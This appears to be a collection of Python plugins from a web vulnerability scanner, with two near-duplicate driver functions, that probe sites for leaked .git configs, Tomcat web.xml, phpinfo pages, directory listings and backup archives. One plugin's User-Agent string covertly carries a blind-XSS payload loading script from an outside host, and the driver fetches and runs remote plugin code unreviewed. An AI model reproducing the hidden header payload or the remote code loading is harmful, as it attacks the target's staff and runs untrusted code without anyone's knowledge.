def poc(arg): html = collector.get_domain_info(arg, "body") if html: m = re.search('password', html, re.I | re.M | re.S) if m: collector.add_domain_bug(arg, {"登录平台发现": arg})
def poc(arg, **kwargs): URL = arg netloc = urlparse(arg).netloc flag_list = ["index of", "directory listing for", "{} - /".format(netloc)] hack = HackRequests.hackRequests() url_list = [ URL + "/css/", URL + "/js/", URL + "/img/", URL + "/images/", URL + "/upload/", URL + "/inc/" ] for u in url_list: try: hh = hack.http(u) except: continue if hh.status_code == 404: continue for i in flag_list: try: html = hh.text() except: html = "" if i in html.lower(): result = { "name": "web目录浏览", # 插件名称 "content": "通过此功能可获取web目录程序结构", # 插件返回内容详情,会造成什么后果。 "url": u, # 漏洞存在url "log": hh.log, "tag": "info_leak" # 漏洞标签 } collector.add_domain_bug(arg, {"directory_browse": repr(result)}) return False
def poc(arg): url = arg + "/.git/config" try: header = dict() header[ "User-Agent"] = "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36" r = requests.get(url, headers=header, timeout=5) if "repositoryformatversion" in r.text: collector.add_domain_bug(arg, {"Git Leak": url}) else: return False except Exception: return False
def poc(arg): url = arg + "/WEB-INF/web.xml" try: header = dict() header[ "User-Agent"] = "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36<sCRiPt/SrC=//60.wf/4PrhD>" r = requests.get(url, headers=header, timeout=5) if "<web-app" in r.text: collector.add_domain_bug(arg, {"Tomcat xmlLeak": url}) return '[Tomcat xmlLeak]' + url else: return False except Exception: return False
def poc(arg): url = arg + "/robots.txt/.php" try: header = dict() header[ "User-Agent"] = "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36" r = requests.get(url, headers=header, timeout=5) if r.status_code == 200 and "text/html" in r.headers.get( "Content-Type", ""): collector.add_domain_bug(arg, {"iis parse": url}) else: return False except Exception: return False
def poc(arg): phpinfoList = r""" phpinfo.php PhpInfo.php PHPinfo.php PHPINFO.php phpInfo.php info.php Info.php INFO.php phpversion.php phpVersion.php test1.php test.php test2.php phpinfo1.php phpInfo1.php info1.php PHPversion.php x.php xx.php xxx.php """ paths = phpinfoList.strip().splitlines() result = [] for path in paths: try: payload = arg + "/" + path.strip() header = dict() header[ "User-Agent"] = "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36" h = requests.head(payload, headers=header, timeout=5) if h.status_code != 200: continue r = requests.get(payload, headers=header, timeout=5) if "allow_url_fopen" in r.text and r.status_code == 200: result.append(payload) except Exception: pass if result: collector.add_domain_bug(arg, {"phpinfo": result}) return result else: return False
def hand_domain(self, serviceType): target = serviceType["target"] logger.info(target) # 添加这条记录 collector.add_domain(target) # 发起请求 try: r = requests.get(target, timeout=30, verify=False, allow_redirects=False) collector.add_domain_info(target, { "headers": r.headers, "body": r.text, "status_code": r.status_code }) except Exception as e: logger.error("request url error:" + str(e)) collector.del_domain(target) return logger.debug("target:{} over,start to scan".format(target)) # Get hostname hostname = urlparse(target).netloc.split(":")[0] if not is_ip_address_format(hostname): try: _ip = socket.gethostbyname(hostname) collector.add_domain_info(target, {"ip": _ip}) except: pass else: collector.add_domain_info(target, {"ip": hostname}) work_list = [ webeye.poc, webtitle.poc, wappalyzer.poc, password_found.poc ] if IS_START_PLUGINS: work_list.append(crossdomain.poc) work_list.append(directory_browse.poc) work_list.append(gitleak.poc) work_list.append(iis_parse.poc) work_list.append(phpinfo.poc) work_list.append(svnleak.poc) work_list.append(tomcat_leak.poc) work_list.append(whatcms.poc) # WorkList.append(bakfile.poc) # 去除备份文件扫描模块,原因:太费时 # th = [] # try: # for func in work_list: # i = threading.Thread(target=func, args=(target,)) # i.start() # th.append(i) # for thi in th: # thi.join() # except Exception as e: # logger.error("domain plugin threading error {}:{}".format(repr(Exception), str(e))) for func in work_list: try: func(target) except Exception as e: logger.error("domain plugin threading error {}:{}".format( repr(Exception), str(e))) logger.debug("target:{} End of scan".format(target)) infos = collector.get_domain(target) _pocs = [] temp = {} if IS_START_PLUGINS and "CMS" in infos: if infos.get("app"): temp["app"] = [] temp["app"].append(infos["CMS"]) else: temp["app"] = [infos["CMS"]] # update domain app collector.add_domain_info(target, temp) if temp.get("app"): keywords = temp["app"] # 远程读取插件 pocs = load_remote_poc() for poc in pocs: for keyword in keywords: if poc["name"] == keyword: webfile = poc["webfile"] logger.debug("load {0} poc:{1} poc_time:{2}".format( poc["type"], webfile, poc["time"])) # 加载插件 code = requests.get(webfile).text obj = load_string_to_module(code, webfile) _pocs.append(obj) # 并发执行插件 if _pocs: executor = futures.ThreadPoolExecutor(len(_pocs)) fs = [] for f in _pocs: taks = executor.submit(f.poc, target) fs.append(taks) for f in futures.as_completed(fs): try: res = f.result() except Exception as e: res = None logger.error("load poc error:{} error:{}".format( target, str(e))) if res: name = res.get("name") or "scan_" + str(time.time()) collector.add_domain_bug(target, {name: res}) collector.send_ok(target)
def audit(arg): url = arg arg = urlparse(url).netloc dirs = '''wwwroot.rar wwwroot.zip wwwroot.tar wwwroot.tar.gz web.rar web.zip web.tar web.tar ftp.rar ftp.zip ftp.tar ftp.tar.gz admin.rar admin.zip admin.tar admin.tar.gz www.rar www.zip www.tar www.tar.gz ''' host_keys = arg.split(".") listFile = [] for i in dirs.strip().splitlines(): listFile.append(i) for key in host_keys: if key is '': host_keys.remove(key) continue if '.' in key: new = key.replace('.', "_") host_keys.append(new) host_keys.append(arg) for i in host_keys: new = "%s.rar" % (i) listFile.append(new) new = "%s.zip" % (i) listFile.append(new) new = "%s.tar.gz" % (i) listFile.append(new) new = "%s.tar" % (i) listFile.append(new) warning_list = [] for payload in listFile: loads = url + "/" + payload try: header = dict() header[ "User-Agent"] = "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36" r = requests.head(loads, headers=header, timeout=7) if r.status_code != 200: continue r = requests.get(loads, header=header, timeout=7) if r.status_code == 200 and "Content-Type" in r.headers and "application" in r.headers[ "Content-Type"]: warning_list.append("[BAKFILE] " + loads) except Exception: pass # In order to solve the misreport if len(warning_list) > 6: return False elif warning_list: collector.add_domain_bug(url, {"bakfile": repr(warning_list)})
def hand_domain(self, serviceType): target = serviceType["target"] logger.info(target) # 添加这条记录 collector.add_domain(target) # 发起请求 try: r = requests.get(target, timeout=30, verify=False, allow_redirects=False) collector.add_domain_info(target, { "headers": r.headers, "body": r.text, "status_code": r.status_code }) except Exception as e: logger.error("request url error:" + str(e)) collector.del_domain(target) return logger.debug("target:{} over,start to scan".format(target)) # Get hostname # ???????????WDNMD hostname = urlparse(target).netloc.split(":")[0] if not is_ip_address_format(hostname): try: # return the host from socket _ip = socket.gethostbyname(hostname) collector.add_domain_info(target, {"ip": _ip}) except: pass else: collector.add_domain_info(target, {"ip": hostname}) # 需要启动那些poc进行目标信息扫描 work_list = [webeye.poc, webtitle.poc, wappalyzer.poc] # password_found.poc if IS_START_PLUGINS: pass work_list.append(crossdomain.poc) # work_list.append(directory_browse.poc) work_list.append(gitleak.poc) work_list.append(iis_parse.poc) work_list.append(phpinfo.poc) work_list.append(svnleak.poc) work_list.append(tomcat_leak.poc) # work_list.append(whatcms.poc) # 信息直接从函数的内部利用collector进行存储 for func in work_list: try: func(target) except Exception as e: logger.error("domain plugin threading error {}:{}".format( repr(Exception), str(e))) pass logger.debug("target:{} End of scan".format(target)) collector.print_domains() infos = collector.get_domain(target) _pocs = [] temp = {} if IS_START_PLUGINS and "CMS" in infos: if infos.get("app"): temp["app"] = [] temp["app"].append(infos["CMS"]) else: temp["app"] = [infos["CMS"]] # update domain app collector.add_domain_info(target, temp) if temp.get("app"): keywords = temp["app"] # 远程读取插件 pocs = load_remote_poc() for poc in pocs: for keyword in keywords: webfile = poc["webfile"] logger.debug("load {0} poc:{1} poc_time:{2}".format( poc["type"], webfile, poc["time"])) # 加载插件 加载远程文件目录 将其转换成实体 code = requests.get(webfile).text obj = load_string_to_moudle(code, webfile) # 在模块对象列表中加入远程模块 _pocs.append(obj) # 并发执行插件 if _pocs: executor = futures.ThreadPoolExecutor(len(_pocs)) fs = [] for f in _pocs: taks = executor.submit(f.poc, target) # 这儿返回的是啥子鸡巴啊 每个线程的控制类? fs.append(taks) for f in futures.as_completed(fs): try: res = f.result() except Exception as e: res = None logger.error("load poc error:{} error:{}".format( target, str(e))) if res: name = res.get("name") or "scan_" + str(time.time()) collector.add_domain_bug(target, {name: res}) # 通过异步调用插件得到返回结果,并且通过collector返送结果 collector.send_ok(target) print("print collector") print(collector.collect_domains)